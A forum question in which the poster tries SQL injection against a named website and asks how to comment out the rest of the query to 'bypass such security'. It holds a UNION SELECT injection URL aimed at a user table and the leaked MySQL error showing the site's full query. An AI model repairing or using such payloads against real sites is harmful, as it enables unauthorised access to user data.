I am trying to inject a basic query, but I think I am missing how to comment out the end of those queries.
I thought using # or --' would work, but I am still ending up with this kind of error:
Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TABLE user ;--' ORDER BY c2_.creationDate DESC' at line 1
So what is the correct way to bypass such security?
What did I do wrong when I wrote:
http://esgi-3.futest.com/subject/12%20UNION%20SELECT%20*%20FROM%20TABLE%20user%20;--'
And this is the full error I get:
An exception occurred while executing 'SELECT s0_.text AS text, s0_.creationDate AS creationDate, s0_.private AS private, u1_.firstName AS firstName, u1_.lastName AS lastName, s0_.user AS user, c2_.userId AS userId24, c2_.subjectId AS subjectId25 FROM subject s0_ INNER JOIN user u1_ ON s0_.user = u1_.id LEFT JOIN comment c2_ ON s0_.id = c2_.subjectId LEFT JOIN user u3_ ON c2_.userId = u3_.id WHERE s0_.id = 12 UNION SELECT * FROM TABLE user ;--' ORDER BY c2_.creationDate DESC': SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'TABLE user ;--' ORDER BY c2_.creationDate DESC' at line 1